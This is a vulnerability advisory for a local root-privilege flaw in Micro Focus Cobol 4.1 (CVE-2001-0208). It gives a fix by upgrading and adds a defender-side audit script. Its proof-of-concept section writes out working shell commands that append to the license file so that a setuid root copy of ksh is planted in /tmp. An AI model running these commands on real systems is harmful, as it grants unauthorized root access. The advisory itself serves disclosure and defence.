Micro Focus Cobol Arbitrary Command Execution Vulnerability
BID:2359
Info
| Bugtraq ID: | 2359 |
| Class: | Configuration Error |
| CVE: | CVE-2001-0208 |
| Remote: | No |
| Local: | Yes |
| Published: | Feb 12 2001 12:00AM |
| Updated: | Jul 11 2009 04:46AM |
| Credit: | First posted to Bugtraq by Dixie Flatline <[email protected]> on Feb 12, 2001. |
| Vulnerable: | Micro Focus Cobol 4.1 |
| Not Vulnerable: | Micro Focus Cobol 4.2 |
Exploit / POC
$ cat >> /var/mfaslmf/nolicense
/bin/cp /bin/ksh /tmp; chmod 4755 /tmp/ksh
^D
[wait until the application server licenses are used up]
$ /tmp/ksh
#
Solution / Fix
Solution:
The vendor has released a fix for this issue in version 4.2.
Micro Focus Cobol 4.1
- Micro Focus Cobol 4.2 http://supportline.microfocus.com/
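A defender-side check for hosts still on 4.1, added here as an example and not taken from the advisory or the vendor: it audits the ownership and mode of the file the proof of concept appends to, and lists setuid files of the kind it leaves in /tmp. It assumes the file's contents run as root (as the `#` prompt above suggests) and so should be writable by root only; the function names are this example's own.

```shell
#!/bin/sh
# Added example: defender-side audit for the file used in the proof of concept.
# The path comes from the advisory; function names are this example's own.
NOLICENSE=/var/mfaslmf/nolicense

# audit_path PATH [OWNER]: report why PATH could be changed by an account
# other than OWNER (assumed to be root). Returns 0 clean, 1 finding, 2 missing.
audit_path() {
    ap_path=$1; ap_owner=${2:-root}; ap_rc=0
    [ -e "$ap_path" ] || { echo "missing: $ap_path"; return 2; }
    if [ -n "$(find "$ap_path" -prune ! -user "$ap_owner")" ]; then
        echo "owner: $ap_path is not owned by $ap_owner"; ap_rc=1
    fi
    if [ -n "$(find "$ap_path" -prune \( -perm -020 -o -perm -002 \))" ]; then
        echo "mode: $ap_path is group- or world-writable"; ap_rc=1
    fi
    return "$ap_rc"
}

# audit_nolicense [FILE] [OWNER]: check the file and its parent directory,
# since a writable directory lets the file be replaced outright.
audit_nolicense() {
    an_file=${1:-$NOLICENSE}; an_owner=${2:-root}; an_rc=0
    audit_path "$an_file" "$an_owner" || an_rc=1
    audit_path "$(dirname "$an_file")" "$an_owner" || an_rc=1
    return "$an_rc"
}

# list_setuid DIR [OWNER]: setuid regular files owned by OWNER under DIR,
# the kind of artifact the proof of concept leaves at /tmp/ksh.
list_setuid() {
    find "$1" -xdev -type f -user "${2:-root}" -perm -4000 2>/dev/null
}

# Typical run as root: audit_nolicense; list_setuid /tmp
```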
References
References:
- Micro Focus Product Homepage (Merant)